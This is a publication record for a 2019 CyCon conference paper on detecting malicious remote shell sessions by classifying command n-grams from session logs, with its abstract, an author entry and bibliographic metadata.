Detection of Malicious Remote Shell Sessions

Authors: Pierre Dumont, Roland Meier, David Gugelmann, and Vincent Lenders
2019 11th International Conference on Cyber Conflict (CyCon)


Remote shell sessions via protocols such as SSH are essential for managing systems, deploying applications, and running experiments. However, combined with weak passwords or flaws in the authentication process, remote shell access becomes a major security risk, as it allows an attacker to run arbitrary commands in the name of an impersonated user or even a system administrator. For example, remote shells of weakly protected systems are often exploited in order to build large botnets, to send spam emails, or to launch distributed denial of service attacks. Also, malicious insiders in organizations often use shell sessions to access and transfer restricted data. In this work, we tackle the problem of detecting malicious shell sessions based on session logs, i.e., recorded sequences of commands that were executed over time. Our approach is to classify sessions as benign or malicious by analyzing the sequence of commands that the shell users executed. We model such sequences of commands as n-grams and use them as features to train a supervised machine learning classifier. Our evaluation, based on freely available data and data from our own honeypot infrastructure, shows that the classifier reaches a true positive rate of 99.4% and a true negative rate of 99.7% after observing only four shell commands.


Dr. Roland Meier
PhD student


	isbn = {978-9949-9904-5-0},
	doi = {10.23919/CYCON.2019.8757163},
	year = {2019-05},
	booktitle = {2019 11th International Conference on Cyber Conflict (CyCon)},
	type = {Conference Paper},
	author = {Dumont, Pierre and Meier, Roland and Gugelmann, David and Lenders, Vincent},
	size = {20 p.},
	issn = {2325-5366},
	keywords = {malware; botnets; machine learning; attribution; digital forensics; digital trust; authentication},
	language = {en},
	address = {Piscataway, NJ},
	publisher = {IEEE},
	title = {Detection of Malicious Remote Shell Sessions},
	PAGES = {8757163},
	Note = {11th Annual International Conference on Cyber Conflict (CyCon) - Silent Battle; Conference Location: Tallinn, Estonia; Conference Date: May 28-31, 2019}

Research Collection: 20.500.11850/366466